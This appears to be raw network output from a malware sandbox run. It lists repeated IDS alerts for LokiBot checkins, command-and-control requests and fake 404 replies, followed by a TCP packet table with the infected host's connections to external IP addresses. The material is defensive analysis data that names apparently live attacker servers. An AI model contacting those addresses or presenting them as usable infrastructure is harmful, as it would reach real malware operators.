                                                                    2024-11-20T07:58:03.143133+01002024318ET MALWARE LokiBot Request for C2 Commands Detected M21192.168.2.224923594.156.177.4180TCP
                                                                    2024-11-20T07:58:03.147969+01002025483ET MALWARE LokiBot Fake 404 Response194.156.177.4180192.168.2.2249235TCP
                                                                    2024-11-20T07:58:03.281828+01002021641ET MALWARE LokiBot User-Agent (Charon/Inferno)1192.168.2.224923694.156.177.4180TCP
                                                                    2024-11-20T07:58:03.281828+01002025381ET MALWARE LokiBot Checkin1192.168.2.224923694.156.177.4180TCP
                                                                    2024-11-20T07:58:03.281828+01002825766ETPRO MALWARE LokiBot Checkin M21192.168.2.224923694.156.177.4180TCP
                                                                    2024-11-20T07:58:04.012582+01002024313ET MALWARE LokiBot Request for C2 Commands Detected M11192.168.2.224923694.156.177.4180TCP
                                                                    2024-11-20T07:58:04.012582+01002024318ET MALWARE LokiBot Request for C2 Commands Detected M21192.168.2.224923694.156.177.4180TCP
                                                                    2024-11-20T07:58:04.017516+01002025483ET MALWARE LokiBot Fake 404 Response194.156.177.4180192.168.2.2249236TCP
                                                                    2024-11-20T07:58:04.153651+01002021641ET MALWARE LokiBot User-Agent (Charon/Inferno)1192.168.2.224923794.156.177.4180TCP
                                                                    2024-11-20T07:58:04.153651+01002025381ET MALWARE LokiBot Checkin1192.168.2.224923794.156.177.4180TCP
                                                                    2024-11-20T07:58:04.153651+01002825766ETPRO MALWARE LokiBot Checkin M21192.168.2.224923794.156.177.4180TCP
                                                                    2024-11-20T07:58:05.015654+01002024313ET MALWARE LokiBot Request for C2 Commands Detected M11192.168.2.224923794.156.177.4180TCP
                                                                    2024-11-20T07:58:05.015654+01002024318ET MALWARE LokiBot Request for C2 Commands Detected M21192.168.2.224923794.156.177.4180TCP
                                                                    2024-11-20T07:58:05.020538+01002025483ET MALWARE LokiBot Fake 404 Response194.156.177.4180192.168.2.2249237TCP
                                                                    2024-11-20T07:58:05.170720+01002021641ET MALWARE LokiBot User-Agent (Charon/Inferno)1192.168.2.224923894.156.177.4180TCP
                                                                    2024-11-20T07:58:05.170720+01002025381ET MALWARE LokiBot Checkin1192.168.2.224923894.156.177.4180TCP
                                                                    2024-11-20T07:58:05.170720+01002825766ETPRO MALWARE LokiBot Checkin M21192.168.2.224923894.156.177.4180TCP
                                                                    2024-11-20T07:58:05.888261+01002024313ET MALWARE LokiBot Request for C2 Commands Detected M11192.168.2.224923894.156.177.4180TCP
                                                                    2024-11-20T07:58:05.888261+01002024318ET MALWARE LokiBot Request for C2 Commands Detected M21192.168.2.224923894.156.177.4180TCP
                                                                    2024-11-20T07:58:05.893320+01002025483ET MALWARE LokiBot Fake 404 Response194.156.177.4180192.168.2.2249238TCP
                                                                    2024-11-20T07:58:06.042036+01002021641ET MALWARE LokiBot User-Agent (Charon/Inferno)1192.168.2.224923994.156.177.4180TCP
                                                                    2024-11-20T07:58:06.042036+01002025381ET MALWARE LokiBot Checkin1192.168.2.224923994.156.177.4180TCP
                                                                    2024-11-20T07:58:06.042036+01002825766ETPRO MALWARE LokiBot Checkin M21192.168.2.224923994.156.177.4180TCP
                                                                    2024-11-20T07:58:06.878837+01002024313ET MALWARE LokiBot Request for C2 Commands Detected M11192.168.2.224923994.156.177.4180TCP
                                                                    2024-11-20T07:58:06.878837+01002024318ET MALWARE LokiBot Request for C2 Commands Detected M21192.168.2.224923994.156.177.4180TCP
                                                                    2024-11-20T07:58:06.884043+01002025483ET MALWARE LokiBot Fake 404 Response194.156.177.4180192.168.2.2249239TCP
                                                                    2024-11-20T07:58:07.032370+01002021641ET MALWARE LokiBot User-Agent (Charon/Inferno)1192.168.2.224924094.156.177.4180TCP
                                                                    2024-11-20T07:58:07.032370+01002025381ET MALWARE LokiBot Checkin1192.168.2.224924094.156.177.4180TCP
                                                                    2024-11-20T07:58:07.032370+01002825766ETPRO MALWARE LokiBot Checkin M21192.168.2.224924094.156.177.4180TCP
                                                                    2024-11-20T07:58:07.903785+01002024313ET MALWARE LokiBot Request for C2 Commands Detected M11192.168.2.224924094.156.177.4180TCP
                                                                    2024-11-20T07:58:07.903785+01002024318ET MALWARE LokiBot Request for C2 Commands Detected M21192.168.2.224924094.156.177.4180TCP
                                                                    2024-11-20T07:58:07.913735+01002025483ET MALWARE LokiBot Fake 404 Response194.156.177.4180192.168.2.2249240TCP
                                                                    2024-11-20T07:58:08.079653+01002021641ET MALWARE LokiBot User-Agent (Charon/Inferno)1192.168.2.224924194.156.177.4180TCP
                                                                    2024-11-20T07:58:08.079653+01002025381ET MALWARE LokiBot Checkin1192.168.2.224924194.156.177.4180TCP
                                                                    2024-11-20T07:58:08.079653+01002825766ETPRO MALWARE LokiBot Checkin M21192.168.2.224924194.156.177.4180TCP
                                                                    2024-11-20T07:58:08.914515+01002024313ET MALWARE LokiBot Request for C2 Commands Detected M11192.168.2.224924194.156.177.4180TCP
                                                                    2024-11-20T07:58:08.914515+01002024318ET MALWARE LokiBot Request for C2 Commands Detected M21192.168.2.224924194.156.177.4180TCP
                                                                    2024-11-20T07:58:08.919532+01002025483ET MALWARE LokiBot Fake 404 Response194.156.177.4180192.168.2.2249241TCP
                                                                    2024-11-20T07:58:09.075720+01002021641ET MALWARE LokiBot User-Agent (Charon/Inferno)1192.168.2.224924294.156.177.4180TCP
                                                                    2024-11-20T07:58:09.075720+01002025381ET MALWARE LokiBot Checkin1192.168.2.224924294.156.177.4180TCP
                                                                    2024-11-20T07:58:09.075720+01002825766ETPRO MALWARE LokiBot Checkin M21192.168.2.224924294.156.177.4180TCP
                                                                    2024-11-20T07:58:09.790944+01002024313ET MALWARE LokiBot Request for C2 Commands Detected M11192.168.2.224924294.156.177.4180TCP
                                                                    2024-11-20T07:58:09.790944+01002024318ET MALWARE LokiBot Request for C2 Commands Detected M21192.168.2.224924294.156.177.4180TCP
                                                                    2024-11-20T07:58:09.795871+01002025483ET MALWARE LokiBot Fake 404 Response194.156.177.4180192.168.2.2249242TCP
                                                                    2024-11-20T07:58:09.961207+01002021641ET MALWARE LokiBot User-Agent (Charon/Inferno)1192.168.2.224924394.156.177.4180TCP
                                                                    2024-11-20T07:58:09.961207+01002025381ET MALWARE LokiBot Checkin1192.168.2.224924394.156.177.4180TCP
                                                                    2024-11-20T07:58:09.961207+01002825766ETPRO MALWARE LokiBot Checkin M21192.168.2.224924394.156.177.4180TCP
                                                                    2024-11-20T07:58:10.690343+01002024313ET MALWARE LokiBot Request for C2 Commands Detected M11192.168.2.224924394.156.177.4180TCP
                                                                    2024-11-20T07:58:10.690343+01002024318ET MALWARE LokiBot Request for C2 Commands Detected M21192.168.2.224924394.156.177.4180TCP
                                                                    2024-11-20T07:58:10.695527+01002025483ET MALWARE LokiBot Fake 404 Response194.156.177.4180192.168.2.2249243TCP
                                                                    2024-11-20T07:58:10.842151+01002021641ET MALWARE LokiBot User-Agent (Charon/Inferno)1192.168.2.224924494.156.177.4180TCP
                                                                    2024-11-20T07:58:10.842151+01002025381ET MALWARE LokiBot Checkin1192.168.2.224924494.156.177.4180TCP
                                                                    2024-11-20T07:58:10.842151+01002825766ETPRO MALWARE LokiBot Checkin M21192.168.2.224924494.156.177.4180TCP
                                                                    2024-11-20T07:58:11.687264+01002024313ET MALWARE LokiBot Request for C2 Commands Detected M11192.168.2.224924494.156.177.4180TCP
                                                                    2024-11-20T07:58:11.687264+01002024318ET MALWARE LokiBot Request for C2 Commands Detected M21192.168.2.224924494.156.177.4180TCP
                                                                    2024-11-20T07:58:11.692160+01002025483ET MALWARE LokiBot Fake 404 Response194.156.177.4180192.168.2.2249244TCP
                                                                    2024-11-20T07:58:11.848537+01002021641ET MALWARE LokiBot User-Agent (Charon/Inferno)1192.168.2.224924594.156.177.4180TCP
                                                                    2024-11-20T07:58:11.848537+01002025381ET MALWARE LokiBot Checkin1192.168.2.224924594.156.177.4180TCP
                                                                    2024-11-20T07:58:11.848537+01002825766ETPRO MALWARE LokiBot Checkin M21192.168.2.224924594.156.177.4180TCP
                                                                    2024-11-20T07:58:12.561533+01002024313ET MALWARE LokiBot Request for C2 Commands Detected M11192.168.2.224924594.156.177.4180TCP
                                                                    2024-11-20T07:58:12.561533+01002024318ET MALWARE LokiBot Request for C2 Commands Detected M21192.168.2.224924594.156.177.4180TCP
                                                                    2024-11-20T07:58:12.566542+01002025483ET MALWARE LokiBot Fake 404 Response194.156.177.4180192.168.2.2249245TCP
                                                                    2024-11-20T07:58:12.738339+01002021641ET MALWARE LokiBot User-Agent (Charon/Inferno)1192.168.2.224924694.156.177.4180TCP
                                                                    2024-11-20T07:58:12.738339+01002025381ET MALWARE LokiBot Checkin1192.168.2.224924694.156.177.4180TCP
                                                                    2024-11-20T07:58:12.738339+01002825766ETPRO MALWARE LokiBot Checkin M21192.168.2.224924694.156.177.4180TCP
                                                                    2024-11-20T07:58:13.441956+01002024313ET MALWARE LokiBot Request for C2 Commands Detected M11192.168.2.224924694.156.177.4180TCP
                                                                    2024-11-20T07:58:13.441956+01002024318ET MALWARE LokiBot Request for C2 Commands Detected M21192.168.2.224924694.156.177.4180TCP
                                                                    2024-11-20T07:58:13.446885+01002025483ET MALWARE LokiBot Fake 404 Response194.156.177.4180192.168.2.2249246TCP
                                                                    2024-11-20T07:58:13.595288+01002021641ET MALWARE LokiBot User-Agent (Charon/Inferno)1192.168.2.224924794.156.177.4180TCP
                                                                    2024-11-20T07:58:13.595288+01002025381ET MALWARE LokiBot Checkin1192.168.2.224924794.156.177.4180TCP
                                                                    2024-11-20T07:58:13.595288+01002825766ETPRO MALWARE LokiBot Checkin M21192.168.2.224924794.156.177.4180TCP
                                                                    2024-11-20T07:58:14.313214+01002024313ET MALWARE LokiBot Request for C2 Commands Detected M11192.168.2.224924794.156.177.4180TCP
                                                                    2024-11-20T07:58:14.313214+01002024318ET MALWARE LokiBot Request for C2 Commands Detected M21192.168.2.224924794.156.177.4180TCP
                                                                    2024-11-20T07:58:14.318123+01002025483ET MALWARE LokiBot Fake 404 Response194.156.177.4180192.168.2.2249247TCP
                                                                    2024-11-20T07:58:14.448889+01002021641ET MALWARE LokiBot User-Agent (Charon/Inferno)1192.168.2.224924894.156.177.4180TCP
                                                                    2024-11-20T07:58:14.448889+01002025381ET MALWARE LokiBot Checkin1192.168.2.224924894.156.177.4180TCP
                                                                    2024-11-20T07:58:14.448889+01002825766ETPRO MALWARE LokiBot Checkin M21192.168.2.224924894.156.177.4180TCP
                                                                    2024-11-20T07:58:15.160454+01002024313ET MALWARE LokiBot Request for C2 Commands Detected M11192.168.2.224924894.156.177.4180TCP
                                                                    2024-11-20T07:58:15.160454+01002024318ET MALWARE LokiBot Request for C2 Commands Detected M21192.168.2.224924894.156.177.4180TCP
                                                                    2024-11-20T07:58:15.165411+01002025483ET MALWARE LokiBot Fake 404 Response194.156.177.4180192.168.2.2249248TCP
                                                                    TimestampSource PortDest PortSource IPDest IP
                                                                    Nov 20, 2024 07:56:31.421825886 CET49163443192.168.2.22198.244.140.41
                                                                    Nov 20, 2024 07:56:31.421879053 CET44349163198.244.140.41192.168.2.22
                                                                    Nov 20, 2024 07:56:31.421977043 CET49163443192.168.2.22198.244.140.41
                                                                    Nov 20, 2024 07:56:31.427613974 CET49163443192.168.2.22198.244.140.41
                                                                    Nov 20, 2024 07:56:31.427630901 CET44349163198.244.140.41192.168.2.22
                                                                    Nov 20, 2024 07:56:32.069742918 CET44349163198.244.140.41192.168.2.22
                                                                    Nov 20, 2024 07:56:32.069871902 CET49163443192.168.2.22198.244.140.41
                                                                    Nov 20, 2024 07:56:32.075449944 CET49163443192.168.2.22198.244.140.41
                                                                    Nov 20, 2024 07:56:32.075474024 CET44349163198.244.140.41192.168.2.22
                                                                    Nov 20, 2024 07:56:32.075764894 CET44349163198.244.140.41192.168.2.22
                                                                    Nov 20, 2024 07:56:32.075823069 CET49163443192.168.2.22198.244.140.41
                                                                    Nov 20, 2024 07:56:32.149152040 CET49163443192.168.2.22198.244.140.41
                                                                    Nov 20, 2024 07:56:32.195341110 CET44349163198.244.140.41192.168.2.22
                                                                    Nov 20, 2024 07:56:32.350197077 CET44349163198.244.140.41192.168.2.22
                                                                    Nov 20, 2024 07:56:32.350302935 CET44349163198.244.140.41192.168.2.22
                                                                    Nov 20, 2024 07:56:32.350403070 CET49163443192.168.2.22198.244.140.41
                                                                    Nov 20, 2024 07:56:32.350475073 CET49163443192.168.2.22198.244.140.41
                                                                    Nov 20, 2024 07:56:32.359553099 CET49163443192.168.2.22198.244.140.41
                                                                    Nov 20, 2024 07:56:32.359580994 CET44349163198.244.140.41192.168.2.22
                                                                    Nov 20, 2024 07:56:32.368149042 CET4916480192.168.2.22192.3.243.136
                                                                    Nov 20, 2024 07:56:32.373701096 CET8049164192.3.243.136192.168.2.22
                                                                    Nov 20, 2024 07:56:32.373811007 CET4916480192.168.2.22192.3.243.136
                                                                    Nov 20, 2024 07:56:32.373878956 CET4916480192.168.2.22192.3.243.136
                                                                    Nov 20, 2024 07:56:32.379159927 CET8049164192.3.243.136192.168.2.22
                                                                    Nov 20, 2024 07:56:32.962903976 CET8049164192.3.243.136192.168.2.22
                                                                    Nov 20, 2024 07:56:32.962941885 CET8049164192.3.243.136192.168.2.22
                                                                    Nov 20, 2024 07:56:32.962970972 CET8049164192.3.243.136192.168.2.22
                                                                    Nov 20, 2024 07:56:32.962980032 CET8049164192.3.243.136192.168.2.22
                                                                    Nov 20, 2024 07:56:32.963004112 CET4916480192.168.2.22192.3.243.136
                                                                    Nov 20, 2024 07:56:32.963009119 CET8049164192.3.243.136192.168.2.22
                                                                    Nov 20, 2024 07:56:32.963027954 CET8049164192.3.243.136192.168.2.22
                                                                    Nov 20, 2024 07:56:32.963042021 CET8049164192.3.243.136192.168.2.22
                                                                    Nov 20, 2024 07:56:32.963052034 CET4916480192.168.2.22192.3.243.136
                                                                    Nov 20, 2024 07:56:32.963052034 CET4916480192.168.2.22192.3.243.136
                                                                    Nov 20, 2024 07:56:32.963052034 CET4916480192.168.2.22192.3.243.136
                                                                    Nov 20, 2024 07:56:32.963061094 CET8049164192.3.243.136192.168.2.22
                                                                    Nov 20, 2024 07:56:32.963062048 CET4916480192.168.2.22192.3.243.136
                                                                    Nov 20, 2024 07:56:32.963073015 CET8049164192.3.243.136192.168.2.22
                                                                    Nov 20, 2024 07:56:32.963093996 CET8049164192.3.243.136192.168.2.22
                                                                    Nov 20, 2024 07:56:32.963094950 CET4916480192.168.2.22192.3.243.136
                                                                    Nov 20, 2024 07:56:32.963100910 CET4916480192.168.2.22192.3.243.136
                                                                    Nov 20, 2024 07:56:32.963129044 CET4916480192.168.2.22192.3.243.136
                                                                    Nov 20, 2024 07:56:32.968157053 CET8049164192.3.243.136192.168.2.22
                                                                    Nov 20, 2024 07:56:32.968189955 CET4916480192.168.2.22192.3.243.136
                                                                    Nov 20, 2024 07:56:32.968208075 CET8049164192.3.243.136192.168.2.22
                                                                    Nov 20, 2024 07:56:32.968230963 CET4916480192.168.2.22192.3.243.136
                                                                    Nov 20, 2024 07:56:32.968242884 CET8049164192.3.243.136192.168.2.22
                                                                    Nov 20, 2024 07:56:32.968250990 CET4916480192.168.2.22192.3.243.136
                                                                    Nov 20, 2024 07:56:32.968278885 CET4916480192.168.2.22192.3.243.136
                                                                    Nov 20, 2024 07:56:33.051387072 CET8049164192.3.243.136192.168.2.22
                                                                    Nov 20, 2024 07:56:33.051404953 CET8049164192.3.243.136192.168.2.22
                                                                    Nov 20, 2024 07:56:33.051420927 CET8049164192.3.243.136192.168.2.22
                                                                    Nov 20, 2024 07:56:33.051431894 CET8049164192.3.243.136192.168.2.22
                                                                    Nov 20, 2024 07:56:33.051440001 CET4916480192.168.2.22192.3.243.136
                                                                    Nov 20, 2024 07:56:33.051465988 CET8049164192.3.243.136192.168.2.22
                                                                    Nov 20, 2024 07:56:33.051467896 CET4916480192.168.2.22192.3.243.136
                                                                    Nov 20, 2024 07:56:33.051467896 CET4916480192.168.2.22192.3.243.136
                                                                    Nov 20, 2024 07:56:33.051501989 CET4916480192.168.2.22192.3.243.136
                                                                    Nov 20, 2024 07:56:33.051628113 CET8049164192.3.243.136192.168.2.22
                                                                    Nov 20, 2024 07:56:33.051645994 CET8049164192.3.243.136192.168.2.22
                                                                    Nov 20, 2024 07:56:33.051660061 CET4916480192.168.2.22192.3.243.136
                                                                    Nov 20, 2024 07:56:33.051668882 CET8049164192.3.243.136192.168.2.22
                                                                    Nov 20, 2024 07:56:33.051672935 CET4916480192.168.2.22192.3.243.136
                                                                    Nov 20, 2024 07:56:33.051682949 CET8049164192.3.243.136192.168.2.22
                                                                    Nov 20, 2024 07:56:33.051698923 CET8049164192.3.243.136192.168.2.22
                                                                    Nov 20, 2024 07:56:33.051706076 CET4916480192.168.2.22192.3.243.136
                                                                    Nov 20, 2024 07:56:33.051723003 CET4916480192.168.2.22192.3.243.136
                                                                    Nov 20, 2024 07:56:33.051728964 CET4916480192.168.2.22192.3.243.136
                                                                    Nov 20, 2024 07:56:33.052428961 CET8049164192.3.243.136192.168.2.22
                                                                    Nov 20, 2024 07:56:33.052472115 CET4916480192.168.2.22192.3.243.136
                                                                    Nov 20, 2024 07:56:33.052509069 CET8049164192.3.243.136192.168.2.22
                                                                    Nov 20, 2024 07:56:33.052522898 CET8049164192.3.243.136192.168.2.22
                                                                    Nov 20, 2024 07:56:33.052537918 CET8049164192.3.243.136192.168.2.22
                                                                    Nov 20, 2024 07:56:33.052558899 CET4916480192.168.2.22192.3.243.136
                                                                    Nov 20, 2024 07:56:33.052571058 CET4916480192.168.2.22192.3.243.136
                                                                    Nov 20, 2024 07:56:33.052963972 CET8049164192.3.243.136192.168.2.22
                                                                    Nov 20, 2024 07:56:33.053005934 CET4916480192.168.2.22192.3.243.136
                                                                    Nov 20, 2024 07:56:33.053040028 CET8049164192.3.243.136192.168.2.22
                                                                    Nov 20, 2024 07:56:33.053050041 CET8049164192.3.243.136192.168.2.22
                                                                    Nov 20, 2024 07:56:33.053066015 CET8049164192.3.243.136192.168.2.22
                                                                    Nov 20, 2024 07:56:33.053076029 CET4916480192.168.2.22192.3.243.136
                                                                    Nov 20, 2024 07:56:33.053076029 CET8049164192.3.243.136192.168.2.22
                                                                    Nov 20, 2024 07:56:33.053097963 CET4916480192.168.2.22192.3.243.136
                                                                    Nov 20, 2024 07:56:33.053107023 CET4916480192.168.2.22192.3.243.136
                                                                    Nov 20, 2024 07:56:33.053869009 CET8049164192.3.243.136192.168.2.22
                                                                    Nov 20, 2024 07:56:33.053880930 CET8049164192.3.243.136192.168.2.22
                                                                    Nov 20, 2024 07:56:33.053895950 CET8049164192.3.243.136192.168.2.22
                                                                    Nov 20, 2024 07:56:33.053917885 CET8049164192.3.243.136192.168.2.22
                                                                    Nov 20, 2024 07:56:33.053920031 CET4916480192.168.2.22192.3.243.136
                                                                    Nov 20, 2024 07:56:33.053920031 CET4916480192.168.2.22192.3.243.136
                                                                    Nov 20, 2024 07:56:33.053946972 CET4916480192.168.2.22192.3.243.136
                                                                    Nov 20, 2024 07:56:33.053977013 CET4916480192.168.2.22192.3.243.136
                                                                    Nov 20, 2024 07:56:33.057435036 CET8049164192.3.243.136192.168.2.22
                                                                    Nov 20, 2024 07:56:33.057455063 CET8049164192.3.243.136192.168.2.22
                                                                    Nov 20, 2024 07:56:33.057487011 CET4916480192.168.2.22192.3.243.136
                                                                    Nov 20, 2024 07:56:33.058116913 CET4916480192.168.2.22192.3.243.136
                                                                    Nov 20, 2024 07:56:33.139914036 CET8049164192.3.243.136192.168.2.22
                                                                    Nov 20, 2024 07:56:33.139940977 CET8049164192.3.243.136192.168.2.22
                                                                    Nov 20, 2024 07:56:33.139966011 CET8049164192.3.243.136192.168.2.22
                                                                    Nov 20, 2024 07:56:33.139976025 CET8049164192.3.243.136192.168.2.22
                                                                    Nov 20, 2024 07:56:33.139990091 CET8049164192.3.243.136192.168.2.22
                                                                    Nov 20, 2024 07:56:33.140002012 CET8049164192.3.243.136192.168.2.22
                                                                    Nov 20, 2024 07:56:33.140007973 CET4916480192.168.2.22192.3.243.136
                                                                    Nov 20, 2024 07:56:33.140012026 CET8049164192.3.243.136192.168.2.22
                                                                    Nov 20, 2024 07:56:33.140007973 CET4916480192.168.2.22192.3.243.136
                                                                    Nov 20, 2024 07:56:33.140028000 CET8049164192.3.243.136192.168.2.22
                                                                    Nov 20, 2024 07:56:33.140041113 CET8049164192.3.243.136192.168.2.22
                                                                    Nov 20, 2024 07:56:33.140042067 CET4916480192.168.2.22192.3.243.136
                                                                    Nov 20, 2024 07:56:33.140042067 CET4916480192.168.2.22192.3.243.136
                                                                    Nov 20, 2024 07:56:33.140055895 CET8049164192.3.243.136192.168.2.22
                                                                    Nov 20, 2024 07:56:33.140064001 CET4916480192.168.2.22192.3.243.136
                                                                    Nov 20, 2024 07:56:33.140075922 CET4916480192.168.2.22192.3.243.136
                                                                    Nov 20, 2024 07:56:33.140089035 CET4916480192.168.2.22192.3.243.136
                                                                    Nov 20, 2024 07:56:33.140198946 CET8049164192.3.243.136192.168.2.22
                                                                    Nov 20, 2024 07:56:33.140234947 CET4916480192.168.2.22192.3.243.136
                                                                    Nov 20, 2024 07:56:33.140280008 CET8049164192.3.243.136192.168.2.22
                                                                    Nov 20, 2024 07:56:33.140290976 CET8049164192.3.243.136192.168.2.22
                                                                    Nov 20, 2024 07:56:33.140328884 CET4916480192.168.2.22192.3.243.136
                                                                    Nov 20, 2024 07:56:33.140341043 CET4916480192.168.2.22192.3.243.136
                                                                    Nov 20, 2024 07:56:33.140433073 CET8049164192.3.243.136192.168.2.22
                                                                    Nov 20, 2024 07:56:33.140444040 CET8049164192.3.243.136192.168.2.22
                                                                    Nov 20, 2024 07:56:33.140485048 CET4916480192.168.2.22192.3.243.136
                                                                    Nov 20, 2024 07:56:33.140485048 CET4916480192.168.2.22192.3.243.136
                                                                    Nov 20, 2024 07:56:33.140605927 CET8049164192.3.243.136192.168.2.22
                                                                    Nov 20, 2024 07:56:33.140616894 CET8049164192.3.243.136192.168.2.22
                                                                    Nov 20, 2024 07:56:33.140633106 CET8049164192.3.243.136192.168.2.22
                                                                    Nov 20, 2024 07:56:33.140645981 CET4916480192.168.2.22192.3.243.136
                                                                    Nov 20, 2024 07:56:33.140650034 CET8049164192.3.243.136192.168.2.22
                                                                    Nov 20, 2024 07:56:33.140660048 CET4916480192.168.2.22192.3.243.136
                                                                    Nov 20, 2024 07:56:33.140660048 CET8049164192.3.243.136192.168.2.22
                                                                    Nov 20, 2024 07:56:33.140676975 CET8049164192.3.243.136192.168.2.22
                                                                    Nov 20, 2024 07:56:33.140686035 CET4916480192.168.2.22192.3.243.136
                                                                    Nov 20, 2024 07:56:33.140691042 CET8049164192.3.243.136192.168.2.22
                                                                    Nov 20, 2024 07:56:33.140695095 CET4916480192.168.2.22192.3.243.136
                                                                    Nov 20, 2024 07:56:33.140711069 CET4916480192.168.2.22192.3.243.136
                                                                    Nov 20, 2024 07:56:33.140742064 CET4916480192.168.2.22192.3.243.136
                                                                    Nov 20, 2024 07:56:33.140758991 CET8049164192.3.243.136192.168.2.22
                                                                    Nov 20, 2024 07:56:33.140769958 CET8049164192.3.243.136192.168.2.22
                                                                    Nov 20, 2024 07:56:33.140784979 CET8049164192.3.243.136192.168.2.22
                                                                    Nov 20, 2024 07:56:33.140810966 CET4916480192.168.2.22192.3.243.136
                                                                    Nov 20, 2024 07:56:33.141489029 CET8049164192.3.243.136192.168.2.22
                                                                    Nov 20, 2024 07:56:33.141513109 CET4916480192.168.2.22192.3.243.136
                                                                    Nov 20, 2024 07:56:33.141524076 CET4916480192.168.2.22192.3.243.136
                                                                    Nov 20, 2024 07:56:33.141541004 CET8049164192.3.243.136192.168.2.22
                                                                    Nov 20, 2024 07:56:33.141551018 CET8049164192.3.243.136192.168.2.22
                                                                    Nov 20, 2024 07:56:33.141566992 CET4916480192.168.2.22192.3.243.136
                                                                    Nov 20, 2024 07:56:33.141580105 CET4916480192.168.2.22192.3.243.136
                                                                    Nov 20, 2024 07:56:33.141624928 CET8049164192.3.243.136192.168.2.22
                                                                    Nov 20, 2024 07:56:33.141634941 CET8049164192.3.243.136192.168.2.22
                                                                    Nov 20, 2024 07:56:33.141649961 CET8049164192.3.243.136192.168.2.22
                                                                    Nov 20, 2024 07:56:33.141665936 CET4916480192.168.2.22192.3.243.136
                                                                    Nov 20, 2024 07:56:33.141668081 CET8049164192.3.243.136192.168.2.22
                                                                    Nov 20, 2024 07:56:33.141679049 CET8049164192.3.243.136192.168.2.22
                                                                    Nov 20, 2024 07:56:33.141680956 CET4916480192.168.2.22192.3.243.136
                                                                    Nov 20, 2024 07:56:33.141691923 CET8049164192.3.243.136192.168.2.22
                                                                    Nov 20, 2024 07:56:33.141702890 CET8049164192.3.243.136192.168.2.22
                                                                    Nov 20, 2024 07:56:33.141705036 CET4916480192.168.2.22192.3.243.136
                                                                    Nov 20, 2024 07:56:33.141719103 CET4916480192.168.2.22192.3.243.136
                                                                    Nov 20, 2024 07:56:33.141733885 CET4916480192.168.2.22192.3.243.136
                                                                    Nov 20, 2024 07:56:33.359152079 CET8049164192.3.243.136192.168.2.22
                                                                    Nov 20, 2024 07:56:33.359251976 CET4916480192.168.2.22192.3.243.136
                                                                    Nov 20, 2024 07:56:33.811103106 CET8049164192.3.243.136192.168.2.22
                                                                    Nov 20, 2024 07:56:33.811208010 CET4916480192.168.2.22192.3.243.136
                                                                    Nov 20, 2024 07:56:34.351767063 CET4916480192.168.2.22192.3.243.136
                                                                    Nov 20, 2024 07:56:34.351809978 CET4916480192.168.2.22192.3.243.136
                                                                    Nov 20, 2024 07:56:34.388900042 CET49165443192.168.2.22198.244.140.41
                                                                    Nov 20, 2024 07:56:34.388932943 CET44349165198.244.140.41192.168.2.22
                                                                    Nov 20, 2024 07:56:34.388982058 CET49165443192.168.2.22198.244.140.41
                                                                    Nov 20, 2024 07:56:34.398787022 CET49165443192.168.2.22198.244.140.41
                                                                    Nov 20, 2024 07:56:34.398804903 CET44349165198.244.140.41192.168.2.22
                                                                    Nov 20, 2024 07:56:35.006823063 CET44349165198.244.140.41192.168.2.22
                                                                    Nov 20, 2024 07:56:35.006880999 CET49165443192.168.2.22198.244.140.41
                                                                    Nov 20, 2024 07:56:35.012293100 CET49165443192.168.2.22198.244.140.41
                                                                    Nov 20, 2024 07:56:35.012314081 CET44349165198.244.140.41192.168.2.22
                                                                    Nov 20, 2024 07:56:35.012593031 CET44349165198.244.140.41192.168.2.22
                                                                    Nov 20, 2024 07:56:35.012635946 CET49165443192.168.2.22198.244.140.41
                                                                    Nov 20, 2024 07:56:35.085285902 CET49165443192.168.2.22198.244.140.41
                                                                    Nov 20, 2024 07:56:35.127337933 CET44349165198.244.140.41192.168.2.22
                                                                    Nov 20, 2024 07:56:35.285305023 CET44349165198.244.140.41192.168.2.22
                                                                    Nov 20, 2024 07:56:35.285475016 CET44349165198.244.140.41192.168.2.22
                                                                    Nov 20, 2024 07:56:35.285480022 CET49165443192.168.2.22198.244.140.41
                                                                    Nov 20, 2024 07:56:35.285572052 CET49165443192.168.2.22198.244.140.41
                                                                    Nov 20, 2024 07:56:35.286758900 CET49165443192.168.2.22198.244.140.41
                                                                    Nov 20, 2024 07:56:35.286787987 CET44349165198.244.140.41192.168.2.22
                                                                    Nov 20, 2024 07:56:35.296103954 CET4916680192.168.2.22192.3.243.136
                                                                    Nov 20, 2024 07:56:35.301090002 CET8049166192.3.243.136192.168.2.22
                                                                    Nov 20, 2024 07:56:35.301178932 CET4916680192.168.2.22192.3.243.136
                                                                    Nov 20, 2024 07:56:35.301343918 CET4916680192.168.2.22192.3.243.136
                                                                    Nov 20, 2024 07:56:35.306191921 CET8049166192.3.243.136192.168.2.22
                                                                    Nov 20, 2024 07:56:35.879904032 CET8049166192.3.243.136192.168.2.22
                                                                    Nov 20, 2024 07:56:35.880012035 CET4916680192.168.2.22192.3.243.136
                                                                    Nov 20, 2024 07:56:35.880037069 CET8049166192.3.243.136192.168.2.22
                                                                    Nov 20, 2024 07:56:35.880048990 CET8049166192.3.243.136192.168.2.22
                                                                    Nov 20, 2024 07:56:35.880072117 CET8049166192.3.243.136192.168.2.22
                                                                    Nov 20, 2024 07:56:35.880080938 CET4916680192.168.2.22192.3.243.136
                                                                    Nov 20, 2024 07:56:35.880084038 CET8049166192.3.243.136192.168.2.22
                                                                    Nov 20, 2024 07:56:35.880099058 CET8049166192.3.243.136192.168.2.22
                                                                    Nov 20, 2024 07:56:35.880111933 CET8049166192.3.243.136192.168.2.22
                                                                    Nov 20, 2024 07:56:35.880119085 CET4916680192.168.2.22192.3.243.136
                                                                    Nov 20, 2024 07:56:35.880125999 CET8049166192.3.243.136192.168.2.22
                                                                    Nov 20, 2024 07:56:35.880141020 CET8049166192.3.243.136192.168.2.22
                                                                    Nov 20, 2024 07:56:35.880153894 CET8049166192.3.243.136192.168.2.22
                                                                    Nov 20, 2024 07:56:35.880176067 CET4916680192.168.2.22192.3.243.136
                                                                    Nov 20, 2024 07:56:35.880176067 CET4916680192.168.2.22192.3.243.136
                                                                    Nov 20, 2024 07:56:35.880176067 CET4916680192.168.2.22192.3.243.136
                                                                    Nov 20, 2024 07:56:35.880176067 CET4916680192.168.2.22192.3.243.136
                                                                    Nov 20, 2024 07:56:35.880192041 CET4916680192.168.2.22192.3.243.136
                                                                    Nov 20, 2024 07:56:35.885080099 CET8049166192.3.243.136192.168.2.22
                                                                    Nov 20, 2024 07:56:35.885117054 CET8049166192.3.243.136192.168.2.22
                                                                    Nov 20, 2024 07:56:35.885158062 CET8049166192.3.243.136192.168.2.22
                                                                    Nov 20, 2024 07:56:35.885215044 CET4916680192.168.2.22192.3.243.136
